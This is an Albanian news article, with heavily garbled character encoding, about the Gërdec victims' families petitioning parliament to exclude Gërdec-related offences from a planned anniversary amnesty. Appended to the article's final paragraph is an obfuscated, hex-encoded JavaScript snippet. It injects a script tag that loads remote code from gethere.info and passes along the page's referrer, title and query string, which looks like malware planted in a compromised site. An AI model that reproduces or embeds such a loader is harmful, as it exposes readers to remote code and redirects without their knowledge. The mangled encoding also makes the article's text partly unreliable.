largea_gerdeci1352361437

TA� mos falen ata qA� vranA� njerA�z!

Shoqata e FamiljarA�ve tA� Viktimave tA� GA�rdecit, me anA� tA� njA� peticioni, i bA�n thirrje Kuvendit qA� tA� vlerA�sojA� me kujdes peshA�n e atyre veprave penale qA� kanA� treguar nA� praktikA� se mund tA� marrin edhe dhjetA�ra jetA� njerA�zish.

Duke shprehur shqetA�simin e tyre lidhje me amnistinA� e propozuar pA�r miratim, me rastin e 100 vjetorit tA� PavarA�sisA�, familjarA�t theksojnA� se Kuvendi ka pA�rjashtuar disa nene nga amnistia tA� cilat dA�nojnA� dhe evidentojnA� veprat penale qA� duhet tA� ndA�shkohen.

a�?NA� draftin e kA�saj amnistie, shohim se autorA�t tregojnA� qartA� se nuk kanA� mA�suar asgjA� nga tragjedia e GA�rdecit. Amnistia nga njA�ra anA� ka pA�rfshirA� shumA� ulje dA�nimesh, por nga ana tjetA�r ka pA�rjashtuar disa krime tA� rA�nda, autorA�t e tA� cilA�ve nuk do pA�rfitojnA� asnjA� ulje. MirA�po kA�tu nuk janA� pA�rjashtuar edhe nenet 282 dhe 289 tA� Kodit Penal qA� pA�rkthehen nA� a�?Shkelje tA� rregullave mbi lA�ndA�t plasA�se, djegA�se dhe radioaktivea��, dhe a�?Shkelje e rregullave tA� mbrojtjes nA� punA�a��. KA�to janA� dy veprat penale kryesore qA� sipas gjykatA�s janA� konsumuar nga tA� pandehurit kryesorA� tA� GA�rdecit. Po kA�shtu janA� harruar tA� pA�rjashtohen nga amnistia edhe neni 161 a�?ShkatA�rrimi i pronA�s nga pakujdesiaa��, apo dhe neni 70/2 i Kodit Penal Ushtarak qA� bA�n fjalA� pA�r a�?ShpA�rdorimin e detyrA�s nga personeli ushtaraka��a�?, thuhet nA� deklaratA�n e shoqatA�s sA� FamiljarA�ve tA� Viktimave tA� GA�rdecit, raporton BW.

FamiljarA�t theksojnA� se nA�se procesi nA� GjykatA�n e Apelit TiranA� pA�rfundon deri mA� 28 nA�ntor 2012, amnistia do tA� ulA� shumA� vjet nga dA�nimi pA�r tA� dA�nuarit e mundshA�m ndaj i bA�jnA� apel ligjvA�nA�sve qA� tragjedia e GA�rdecit tA� mos trajtohet si krim pA�r tu amnistuar, sado festA� tA� ketA� ShqipA�ria.

a�?Me anA� tA� kA�saj amnistie nuk bA�het gjA� tjetA�r veA�se jepet mesazhi i pamoralshA�m se vrasja e njA� fshati tA� tA�rA� A�shtA� e parA�ndA�sishme nA� njA� shoqA�ri demokratike. Kjo vepA�r penale, ndonA�se nA� dukje A�shtA� mA� e lehtA�, A�shtA� e pamoralshme qA� pas 3 vjetA�sh endje gjyqeve ato tA� mbyllen me rastin e njA� feste. PA�r kA�to arsye kA�rkojmA� me forcA� qA� amnistia tA� mos falA� asnjA� vepA�r penale qA� lidhet me GA�rdecin. Kuvendi A�shtA� ende nA� kohA� qA� tA� riparojA� kA�tA� gabim nA� draftin e paraqitura�?, pA�rfundon deklarata e shoqatA�s sA� FamiljarA�ve tA� GA�rdecit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}